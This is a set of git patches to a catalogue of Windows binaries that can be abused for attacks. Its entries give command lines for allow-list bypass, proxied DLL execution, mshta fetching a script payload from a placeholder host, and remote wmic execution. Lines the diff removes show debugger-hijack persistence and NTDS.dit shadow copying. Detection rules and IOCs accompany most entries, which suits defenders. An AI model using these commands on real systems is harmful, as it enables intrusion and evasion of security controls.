1fdea2a..c9ca1ab 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml 
@@ -1,24 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index d5e07b3..6182256 100644 --- a/yml/OSScripts/UtilityFunctions.yml 
+++ b/yml/OSScripts/UtilityFunctions.yml @@ -1,24 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' ---- +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 2adf80a..d056118 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml 
@@ -1,39 +1,39 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Fsi.exe 
+Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- 
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 54e1cf5..b0701fc 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -1,35 +1,35 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. 
+Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 9d851cf..99c551d 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml 
@@ -1,34 +1,34 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: 2020-10-14 -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Name: Alfie Champion - Handle: '@ajpc500' ---- +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: 2020-10-14 +Commands: + - Command: procdump.exe -md calc.dll explorer.exe + 
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Name: Alfie Champion + Handle: '@ajpc500' +--- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..7c897fe 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -1,31 +1,31 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..8ed47a3 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml 
@@ -1,28 +1,28 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- From b92ee99627d84fd17697e513960a3c423ff2dd34 Mon Sep 17 00:00:00 2001 From: Wietze Date: Thu, 5 May 2022 11:12:22 +0100 Subject: [PATCH 06/11] Addressing @bohops's feedback --- yml/OSBinaries/Jsc.yml | 6 +++--- yml/OSBinaries/Mmc.yml | 2 +- yml/OSBinaries/Msbuild.yml | 17 +++++++++-------- yml/OSBinaries/Mshta.yml | 8 ++++---- yml/OSBinaries/Wmic.yml | 21 --------------------- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/comsvcs.yml | 2 +- yml/OSScripts/Syncappvpublishingserver.yml | 2 +- yml/OSScripts/Winrm.yml | 6 +++--- 11 files changed, 25 insertions(+), 45 deletions(-) diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9bfb036..5356363 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml 
@@ -1,18 +1,18 @@ --- Name: Jsc.exe -Description: Binary file used by .NET to compile javascript code to .exe or .dll format +Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format Author: 'Oddvar Moe' Created: 2019-05-31 Commands: - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. + Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. + Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4f31b21..77453bf 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.014 - OperatingSystem: Windows 10 (and possibly earlier versions) + OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 5ef010d..c649545 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
@@ -18,15 +18,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: msbuild.exe @sample.rsp - Description: Executes Logger statements from rsp file - Usecase: Execute DLL - Category: Execute - Privileges: User - MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Description: Executes generated Logger dll file with TargetLogger export + Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL Category: Execute Privileges: User @@ -39,6 +32,13 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: msbuild.exe @sample.rsp + Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. + Usecase: Bypass command-line based detections + Category: Execute + Privileges: User + MitreID: T1036 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -69,6 +69,7 @@ Resources: - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/165 + - Link: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files - Link: https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events Acknowledgement: - Person: Casey Smith diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2822620..999de1b 100644 --- a/yml/OSBinaries/Mshta.yml 
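Review bot: The Description on the re-added `msbuild.exe @sample.rsp` entry is ungrammatical — "will interpret" has no subject; `Description: Placing any valid msbuild.exe command-line options in an RSP file and invoking it as above makes MSBuild interpret them as if they had been passed on the command line.` reads cleanly. Since the Usecase is explicitly `Bypass command-line based detections`, the entry would also benefit from a Detection line naming the artifact that does remain observable, e.g. `- IOC: msbuild.exe launched with an @-prefixed response-file argument`, as the Resources hunk below adds only the documentation link. Msbuild's Detection section is outside the visible hunks, so it may already cover this.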
+++ b/yml/OSBinaries/Mshta.yml @@ -11,14 +11,14 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) + - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -36,7 +36,7 @@ Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe Code_Sample: - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct + - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index ac38398..8b5c3c5 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml 
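Review bot: The new Code_Sample link `https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019` is not pinned to a revision, whereas the Detection links in the same hunk's context are pinned to specific commits (`.../sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/...`). A gist can be edited or deleted after the fact, so the sample the entry vouches for can change under the link; pinning it to a revision URL (`https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019/<revision-sha>`) or vendoring it under the project's Payload directory, as the replaced raw.githubusercontent.com link did, keeps the reference stable.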
@@ -18,13 +18,6 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" - Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. - Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system 
@@ -32,20 +25,6 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
- Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
- Usecase: Execute binary with scheduled task created with wmic on a remote computer
- Category: Execute
- Privileges: User
- MitreID: T1218
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
- Description: Create a volume shadow copy of NTDS.dit that can be copied.
- Usecase: Execute binary on remote system
- Category: Execute
- Privileges: User
- MitreID: T1218
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
 Description: Create a volume shadow copy of NTDS.dit that can be copied.
 Usecase: Execute binary on remote system
diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml
index b015321..8ee42f4 100644
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@@ -15,7 +15,7 @@ Commands:
